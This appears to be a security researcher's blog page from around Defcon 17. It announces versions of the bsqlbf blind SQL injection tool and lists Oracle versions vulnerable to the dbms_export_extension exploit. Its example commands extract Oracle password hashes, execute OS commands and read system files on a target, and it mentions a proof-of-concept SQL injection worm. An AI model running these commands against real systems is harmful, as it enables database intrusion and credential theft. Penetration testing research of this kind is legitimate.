Here are my slides and video demonstrations which i presented at Defcon 17.
There are 3 demos to go with the slides:
Demo 1: Exploiting PL/SQL Injection from Web Applications.
Demo 2: Exploiting SQL Injection in Oracle Applications with Bsqlbf
Demo 3: A proof of concept of Oracle SQL Injection Worm
Tools: There are 2 tools shown in demos above:
1. Bsqlbf: Download from Project Homepage
2. OAP_Hacker.pl: Download Here
Enjoy!! 
A new version of bsqlbf is now available. The following are the new additions:
-------------------
-type: Type of injection:
3: Type 3 is extracting data with DBA privileges
(e.g. Oracle password hashes from sys.user$)
4: Type 4 is O.S code execution(default: ping 127.0.0.1)
5: Type 5 is Reading O.S files(default: c:\boot.ini)
--------------------
Type 4 (O.S code execution) supports the following sub types:
-stype: How you want to execute command:
0: SType 0 (default) is based on java,
universal but won't work against XE
1: SType 1 against oracle 9 with plsql_native_make_utility
2: SType 2 against oracle 10 with dbms_scheduler
———————-
Examples:
./bsqlbf-v2.3.pl -url http://192.168.1.1/injection.jsp/1.jsp?p=1 -type 3 -match “true” -sql “select password from sys.user$ where rownum=1″
./bsqlbf-v2.3.pl -url http://192.168.1.1/injection.jsp/1.jsp?p=1 -type 4 -match “true” -cmd “ping notsosecure.com”
./bsqlbf-v2.3.pl -url http://192.168.1.1/injecti.jsp/1.jsp?p=1 -type 5 -match “true” -file “C:\boot.ini”
———————
Download from Project Homepage: http://code.google.com/p/bsqlbf-v2/
———————
All these additions are based on dbms_export_extension exploit. This will work against the following oracle versions:
Oracle 8.1.7.4, 9.2.0.1 – 9.2.0.7, 10.1.0.2 – 10.1.0.4, 10.2.0.1-10.2.0.2, XE
————————
Enjoy…
I finally managed to fix a few bugs and release a new version. Other than the bug fixing, the new version also supports blind sql injection in “order by”, “group by” clause.
There are currently a few issues with threaded perl. I have tested this under windows using activeperl. As always, any bug report is highly appreciated.
Sid
Bsqlbf was originally written by A. Ramos from www.514.es and was intended to exploit blind sql injection against mysql backend database. This is a modified version of the same tool. It supports blind sql injection against the following databases:-
MS-SQL
MY-SQL
PostgreSQL
Oracle
It supports injection in string and integer fields. The feature which separates this tool from all other sql injection tools is that it supports custom SQL queries to be supplied with the -sql switch.
It supports 2 modes of attack(-type):
Type 0: Blind SQL Injection based on True And Flase response
Type 1: Blind SQL Injection based on True And Error Response(details)
Usage: $./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"
Download: http://bsqlbf-v2.googlecode.com/files/bsqlbf-v2.1.zip
Send Your feedbacks/suggestions to sid-at-notsosecure(dot)com
Although, i don't have the habit of reading books, here are a few books which you may consider reading.
———–
Database Hackers Handbook.(David Litchfield)
Oracle Hacker's handbook (David Litchfield)
Hacking Web Applications Exposed (TMH Publications)
Essential PHP Security (Chris Shifflett)
TCP/IP Illustrated (Comer).
Hacking Linux Exposed.
——-
As this list is really small, it is clear that i need to read more books. If you know any good book related to pentesting (or security in general) please share it with us.
